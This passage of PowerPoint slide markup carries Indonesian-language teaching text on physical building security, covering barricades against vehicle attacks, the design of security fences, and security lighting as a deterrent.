              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbolehkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menembus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>barikade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Lokasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terkena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>teroris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>barikade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tonggak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kendaraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kencang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>arah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Pagar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pagar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pagar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menembusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipotong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemanjatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kawat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>duri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemagaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekurangannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pagar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintimidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masyarakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pencahayaan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persepsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>malam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>garasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>parkir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempersulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
